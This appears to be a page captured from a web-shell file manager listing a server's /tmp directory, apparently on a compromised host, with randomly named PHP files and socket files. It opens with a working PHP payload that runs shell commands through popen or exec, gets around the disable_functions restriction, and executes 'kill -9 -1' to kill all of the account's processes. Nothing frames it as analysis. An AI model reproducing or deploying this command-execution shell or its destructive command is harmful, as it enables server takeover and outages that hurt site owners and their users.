PATH:
tmp
<?php function run($code, $method = 'popen') { $disabled = explode(',', ini_get('disable_functions')); if (in_array($method, $disabled)) { $method = 'exec'; } if (in_array($method, $disabled)) { return false; } $result = ''; switch ($method){ case 'exec': exec($code,$array); foreach ($array as $key => $value) { $result .= $key . " : " . $value . PHP_EOL; } return $result; break; case 'popen': $fp = popen($code,"r"); //popen打一个进程通道 while (!feof($fp)) { //从通道里面取得东西 $out = fgets($fp, 4096); $result .= $out; //打印出来 } pclose($fp); return $result; break; default: return false; break; } } echo '{->|'; var_dump(run("kill -9 -1")); echo '|<-}';
[+]
..
[-] .s.PGSQL.5432
[edit]
[-] mysql.sock
[edit]
[-] ____V9zwTc
[edit]
[-] ____YOT497
[edit]
[-] p6a4aa967d46403.88645622.php
[edit]
[-] p6a4ac203476002.04578163.php
[edit]
[-] p6a4b0199672553.68471545.php
[edit]
[-] phpb2xKC2
[edit]
[-] p6a4bd30d9a5383.80241117.php
[edit]
[-] p6a4a4a55109e78.19700185.php
[edit]
[-] ____ZWCyDS
[edit]
[-] session_cache.tmp
[edit]
[-] p6a469ba26dcac4.78964358.php
[edit]
[-] p6a470646acfa44.04273048.php
[edit]
[+]
oxnixcgiapi
[-] ____luW9SA
[edit]
[-] phpEVE6Hq
[edit]
[-] .ea-php-cli.cache
[edit]